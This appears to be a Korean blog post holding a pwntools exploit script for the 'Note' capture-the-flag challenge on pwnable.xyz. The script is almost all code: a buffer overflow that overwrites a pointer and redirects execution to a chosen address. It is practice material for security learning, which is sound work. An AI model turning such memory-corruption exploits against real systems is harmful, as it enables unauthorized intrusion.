theFaunia in the wild

History view

Pwning in Linux

Exploit - Note pwnable.xyz

theFaunia in the wild 2019. 3. 1. 01:15

Exploit

from pwn import *
import time
context.log_level = 'debug'
p = remote("svc.pwnable.xyz",30016)
#p = process('./note')

#gdb.attach(p,'''
#break *0x0000000000400a10
#continue
#''')


p.recvuntil("> ")
p.sendline("1")

p.recvuntil("Note len? ")
p.sendline("38")

p.recvuntil("note: ")
payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00"
p.sendline(payload)

p.recvuntil("> ")
p.sendline("2")
p.recvuntil("desc: ")
p.sendline("\x3c\x09\x40\x00\x00\x00\x00\x00")

p.recvuntil("> ")
p.sendline("12")

p.recvall()
p.close()

'Pwning in Linux' 카테고리의 다른 글

Writeup - echo1 (0)	2019.03.01
Exploit - Two targets pwnable.xyz (0)	2019.03.01
Exploit - Misalignment pwnable.xyz (0)	2019.03.01
Exploit - GrownUp pwnable.xyz (0)	2019.03.01
Trigger return NULL value in Malloc (0)	2019.02.28

Comments

Notice

Recent Posts

Recent Comments

Total

Today

Yesterday

Link

TAG more

« 2024/04 »
일	월	화	수	목	금	토
	1	2	3	4	5	6
7	8	9	10	11	12	13
14	15	16	17	18	19	20
21	22	23	24	25	26	27
28	29	30

Archives

Pwning stuffs

History view

Exploit - Note pwnable.xyz

Exploit

'Pwning in Linux' 카테고리의 다른 글

티스토리툴바